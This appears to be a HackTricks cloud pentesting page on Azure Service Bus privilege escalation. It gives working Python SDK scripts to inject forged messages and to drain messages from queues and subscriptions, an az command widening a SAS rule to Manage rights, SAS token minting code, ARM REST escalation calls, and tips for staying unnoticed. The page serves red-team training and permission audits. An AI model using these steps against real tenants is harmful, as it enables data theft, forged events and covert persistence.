Az - Service Bus Privesc


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Service Bus

For more information check:

Az - Service Bus

Send Messages. Action: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OR Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action

Either action returns the keys of a namespace-level shared access policy (authorization rule), and the PrimaryConnectionString you get back embeds the rule name and its key. That connection string is a bearer credential: whoever holds it gets exactly the rights the rule carries (Send, Listen and/or Manage; the default RootManageSharedAccessKey rule has all three) on every queue and topic in the namespace, with no Entra ID identity or RBAC check involved. With a Send-capable rule you can publish to any queue or topic, which lets you inject forged events into downstream consumers, impersonate legitimate producers, or flood an entity to disrupt processing. Prefer listkeys when you have it: regenerateKeys also hands you a working key, but it replaces the previous one, so legitimate clients using the old key start failing and the activity is likely to be noticed.

python
# pip install azure-servicebus

import asyncio
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage

# The connection string obtained via listkeys/regenerateKeys and a topic of the namespace
NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_NAME = "<TOPIC_NAME>"

# Send a single message to the topic
async def send_individual_message(publisher):
    single_message = ServiceBusMessage("Hacktricks-Training: Single Item")
    await publisher.send_messages(single_message)
    print("Sent a single message containing 'Hacktricks-Training'")

# Send several messages in one call (the SDK wraps the list in a batch for you)
async def send_multiple_messages(publisher):
    message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)]
    await publisher.send_messages(message_list)
    print("Sent a list of 5 messages containing 'Hacktricks-Training'")

# Build an explicit batch so the SDK enforces the broker's maximum batch size
async def send_grouped_messages(publisher):
    grouped_message_batch = await publisher.create_message_batch()
    for i in range(10):
        try:
            grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))
        except ValueError:
            # ValueError means the batch is full; a real producer would send it and start a new one
            break
    await publisher.send_messages(grouped_message_batch)
    print("Sent a batch of 10 messages containing 'Hacktricks-Training'")

# Authenticate with the connection string and run the three senders
async def execute():
    async with ServiceBusClient.from_connection_string(
        conn_str=NAMESPACE_CONNECTION_STR,
        logging_enable=True) as sb_client:
        # Use sb_client.get_queue_sender(queue_name=...) to target a queue instead of a topic
        publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)
        # One context for the sender is enough; it is closed when the block exits
        async with publisher:
            await send_individual_message(publisher)
            await send_multiple_messages(publisher)
            await send_grouped_messages(publisher)

asyncio.run(execute())
print("Messages Sent")
print("----------------------------")

Receive Messages. Action: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OR Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action

As above, either action yields the PrimaryConnectionString. With a rule that carries the Listen right you can receive from every queue and from every subscription of every topic in the namespace, which exposes whatever the application passes through the bus (orders, tokens, personal data, internal events) and lets you exfiltrate it or starve the real consumers. Two caveats: receiving in the default peek-lock mode and then completing a message deletes it from that queue or subscription, so the legitimate consumer never processes it, which is both disruptive and noticeable; peeking instead reads messages without locking or removing them. Also, each topic subscription holds its own copy of the messages, so draining one subscription does not affect the others, and the dead-letter sub-queue of an entity may still hold older messages that failed processing.

python
# pip install azure-servicebus

import asyncio
from azure.servicebus.aio import ServiceBusClient

NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_NAME = "<TOPIC_NAME>"
SUBSCRIPTION_NAME = "<TOPIC_SUBSCRIPTION_NAME>"  # Topic subscription to read from

# Receive and process messages from a Service Bus subscription
async def receive_and_process_messages():
    async with ServiceBusClient.from_connection_string(
        conn_str=NAMESPACE_CONNECTION_STR,
        logging_enable=True) as servicebus_client:

        # For a queue use servicebus_client.get_queue_receiver(queue_name=...)
        receiver = servicebus_client.get_subscription_receiver(
            topic_name=TOPIC_NAME,
            subscription_name=SUBSCRIPTION_NAME,
            max_wait_time=5
        )

        async with receiver:
            # Pull up to 20 messages, waiting at most 5 seconds for them
            received_msgs = await receiver.receive_messages(
                max_wait_time=5,
                max_message_count=20
            )
            for msg in received_msgs:
                print("Received: " + str(msg))
                # Completing removes the message, so the legitimate consumer never sees it.
                # To read without consuming use receiver.peek_messages() (no lock, no removal),
                # or receiver.abandon_message(msg) to release the lock and put it back.
                await receiver.complete_message(msg)

asyncio.run(receive_and_process_messages())
print("Message Receiving Completed")
print("----------------------------")
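Both sections above rest on the same fact: the connection string is a shared key, and a client proves possession of it by signing a SAS token. The following example is added here and is not code from the original page; it parses a PrimaryConnectionString of the shape the az CLI returns, mints a SAS token scoped to one entity with a chosen lifetime (the string-to-sign is the URL-encoded resource URI, a newline and the expiry, HMAC-SHA256 with the key, as documented by Microsoft), and verifies a token the way the broker does. The namespace name, entity name and key are constructed sample values, not real credentials.

```python
# Added example (not from the original page): what a Service Bus connection
# string contains and how it becomes a SAS token.
import base64
import hashlib
import hmac
import time
from typing import Optional
from urllib.parse import parse_qs, quote, quote_plus

# Constructed sample credential (not a real key): same shape as the
# primaryConnectionString field returned by `az ... authorization-rule keys list`.
SAMPLE_CONNECTION_STRING = (
    "Endpoint=sb://contoso-bus.servicebus.windows.net/;"
    "SharedAccessKeyName=RootManageSharedAccessKey;"
    "SharedAccessKey=dGhpcyBpcyBub3QgYSByZWFsIGtleSwganVzdCBhIHNhbXBsZQ=="
)


def parse_connection_string(conn_str: str) -> dict:
    """Split 'Endpoint=...;SharedAccessKeyName=...;SharedAccessKey=...' into its fields.
    Splits on the first '=' only, because the base64 key may end in '=' padding."""
    parts = {}
    for segment in conn_str.strip().rstrip(";").split(";"):
        key, _, value = segment.partition("=")
        parts[key.strip()] = value.strip()
    for required in ("Endpoint", "SharedAccessKeyName", "SharedAccessKey"):
        if required not in parts:
            raise ValueError(f"connection string is missing {required}")
    return parts


def make_sas_token(conn_str: str, entity_path: str = "", ttl_seconds: int = 3600,
                   now: Optional[int] = None) -> str:
    """Mint a SAS token from the connection string, scoped to one queue/topic
    (or to the whole namespace when entity_path is empty) and valid for ttl_seconds."""
    parts = parse_connection_string(conn_str)
    host = parts["Endpoint"].replace("sb://", "").rstrip("/")
    resource_uri = f"https://{host}/{entity_path}".rstrip("/")
    expiry = int((time.time() if now is None else now) + ttl_seconds)
    encoded_uri = quote_plus(resource_uri)
    # Per Microsoft's SAS format: HMAC-SHA256 over "<encoded uri>\n<expiry>" with the UTF-8 bytes of the key
    string_to_sign = f"{encoded_uri}\n{expiry}".encode("utf-8")
    digest = hmac.new(parts["SharedAccessKey"].encode("utf-8"), string_to_sign, hashlib.sha256).digest()
    signature = quote(base64.b64encode(digest).decode("ascii"), safe="")
    return f"SharedAccessSignature sr={encoded_uri}&sig={signature}&se={expiry}&skn={parts['SharedAccessKeyName']}"


def verify_sas_token(token: str, keys: dict, now: Optional[int] = None) -> bool:
    """Validate a token as the broker would: look up the key named by skn,
    recompute the HMAC over sr and se, compare in constant time, then check expiry.
    keys maps SharedAccessKeyName -> SharedAccessKey."""
    prefix = "SharedAccessSignature "
    if not token.startswith(prefix):
        return False
    fields = parse_qs(token[len(prefix):], keep_blank_values=True)
    try:
        sr, sig, se, skn = (fields[k][0] for k in ("sr", "sig", "se", "skn"))
    except KeyError:
        return False
    key = keys.get(skn)
    if key is None:
        return False
    expected = base64.b64encode(
        hmac.new(key.encode("utf-8"), f"{quote_plus(sr)}\n{se}".encode("utf-8"), hashlib.sha256).digest()
    ).decode("ascii")
    if not hmac.compare_digest(expected, sig):
        return False
    current = int(time.time()) if now is None else now
    return int(se) > current


if __name__ == "__main__":
    parts = parse_connection_string(SAMPLE_CONNECTION_STRING)
    token = make_sas_token(SAMPLE_CONNECTION_STRING, "orders", ttl_seconds=600)
    print(token)
    print("valid:", verify_sas_token(token, {parts["SharedAccessKeyName"]: parts["SharedAccessKey"]}))
```

A token minted this way is what the SDK sends for you under the hood; it can also be placed in an Authorization header against the Service Bus REST endpoint. Scoping it to a single entity and a short expiry limits the blast radius if it leaks, but note that the scope is only as narrow as the rule: a token signed with a Manage key still authorises everything that key can do on that entity.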

Microsoft.ServiceBus/namespaces/authorizationRules/write

With this action you can create a new shared access policy on the namespace, or update an existing one to add the Manage, Send and Listen rights. A Manage rule has full control over the namespace data plane (creating and deleting queues, topics and subscriptions, sending and receiving on all of them) and works independently of Azure RBAC assignments, so it is also a durable way to keep access after your role is removed. The write action by itself does not return any key: after creating or widening the rule you still need listkeys/action or regenerateKeys/action (see above) to obtain its connection string. Rule changes are ARM operations and show up in the Activity Log and in the portal, so adding a new inconspicuously named rule is more discreet than modifying RootManageSharedAccessKey.

bash
# Grant all three rights to an existing rule (RootManageSharedAccessKey already
# has them; substitute the name of a weaker rule that you are allowed to modify)
az servicebus namespace authorization-rule update \
    --resource-group <MyResourceGroup> \
    --namespace-name <MyNamespace> \
    --name RootManageSharedAccessKey \
    --rights Manage Listen Send
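The az command above is a thin wrapper over Azure Resource Manager. The following example is added here and is not code from the original page; it spells out the REST calls behind the escalation and the RBAC action that authorises each one, which makes the point that the write action alone never returns a key: creating or widening the rule is a PUT on the rule resource, and reading its keys is a separate POST to listKeys (or regenerateKeys). Subscription, resource group, namespace and rule names are placeholders, the API version is one current Microsoft.ServiceBus version chosen here, and execute_plan needs an ARM access token such as the one `az account get-access-token --query accessToken -o tsv` prints.

```python
# Added example (not from the original page): the ARM requests behind
# `az servicebus namespace authorization-rule ...`, with the RBAC action each needs.
import json
import urllib.request

ARM = "https://management.azure.com"
API_VERSION = "2021-11-01"  # assumed: a current Microsoft.ServiceBus API version


def rule_id(subscription: str, resource_group: str, namespace: str, rule: str) -> str:
    """ARM resource id of a namespace-level authorization rule."""
    return (f"/subscriptions/{subscription}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.ServiceBus/namespaces/{namespace}/authorizationRules/{rule}")


def plan_sas_escalation(subscription: str, resource_group: str, namespace: str, rule: str,
                        rights=("Manage", "Send", "Listen"), regenerate: bool = False) -> list:
    """Return the ordered HTTP calls to (1) create or widen a SAS rule and (2) obtain its keys,
    each tagged with the Azure RBAC action that authorises it. Nothing is sent here."""
    base = f"{ARM}{rule_id(subscription, resource_group, namespace, rule)}"
    create_or_update = {
        "step": "create-or-update rule",
        "method": "PUT",
        "url": f"{base}?api-version={API_VERSION}",
        "body": {"properties": {"rights": list(rights)}},
        "requires": "Microsoft.ServiceBus/namespaces/authorizationRules/write",
    }
    if regenerate:
        # Returns fresh keys but invalidates the old primary key: noisy, breaks legitimate clients
        get_keys = {
            "step": "regenerate keys",
            "method": "POST",
            "url": f"{base}/regenerateKeys?api-version={API_VERSION}",
            "body": {"keyType": "PrimaryKey"},
            "requires": "Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action",
        }
    else:
        get_keys = {
            "step": "read keys",
            "method": "POST",
            "url": f"{base}/listKeys?api-version={API_VERSION}",
            "body": None,
            "requires": "Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action",
        }
    return [create_or_update, get_keys]


def execute_plan(plan: list, bearer_token: str) -> dict:
    """Send the planned calls with an ARM bearer token and return the last response,
    i.e. the key set (primaryConnectionString, primaryKey, ...) from listKeys/regenerateKeys."""
    result = {}
    for call in plan:
        data = json.dumps(call["body"]).encode("utf-8") if call["body"] is not None else None
        req = urllib.request.Request(
            call["url"], data=data, method=call["method"],
            headers={"Authorization": f"Bearer {bearer_token}", "Content-Type": "application/json"},
        )
        with urllib.request.urlopen(req) as resp:
            result = json.load(resp)
    return result


if __name__ == "__main__":
    for call in plan_sas_escalation("<subscription-id>", "<MyResourceGroup>", "<MyNamespace>", "<NewRuleName>"):
        print(f"{call['method']} {call['url']}\n  body={call['body']}\n  requires {call['requires']}")
```

Running the plan with only the write action succeeds on the PUT and fails with 403 on listKeys, which is the practical test of whether the remaining piece is missing; an audit of a role definition should therefore treat authorizationRules/write plus listkeys/action (or regenerateKeys/action) as equivalent to full data-plane access on the namespace.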

References

  • https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
  • https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
  • https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
  • https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
  • https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
